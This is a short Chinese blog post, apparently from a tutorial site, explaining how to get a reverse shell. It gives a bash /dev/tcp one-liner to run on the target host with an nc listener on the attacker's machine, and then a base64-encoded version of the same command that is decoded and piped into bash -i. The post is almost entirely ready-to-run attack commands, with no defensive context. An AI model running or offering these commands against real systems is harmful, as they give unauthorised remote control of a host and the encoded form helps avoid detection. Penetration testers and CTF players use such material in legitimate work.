反弹Shell

1、nc反弹
在靶机在执行 ,xx.xx.xx是你本机的ip地址
bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1

在本机上执行
nc -lvnp 8000

就可以收到反弹过来的shell了

2、nc采用base64编码反弹

首先把这个语句进行base64编码,192.168.1.1是本机的ip地址
bash -i >& /dev/tcp/192.168.1.1/8000 0>&1

编码后为
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84MDAwICAwPiYx

在靶机执行
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84MDAwICAwPiYx}|{base64,-d}|{bash,-i}'

接着在本机执行
nc -lvnp 8000
posted @   Cloud_strife  阅读(133)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· Vue3状态管理终极指南:Pinia保姆级教程
历史上的今天:
2018-12-06 python实现K-means 并进行演示
点击右上角即可分享
微信分享提示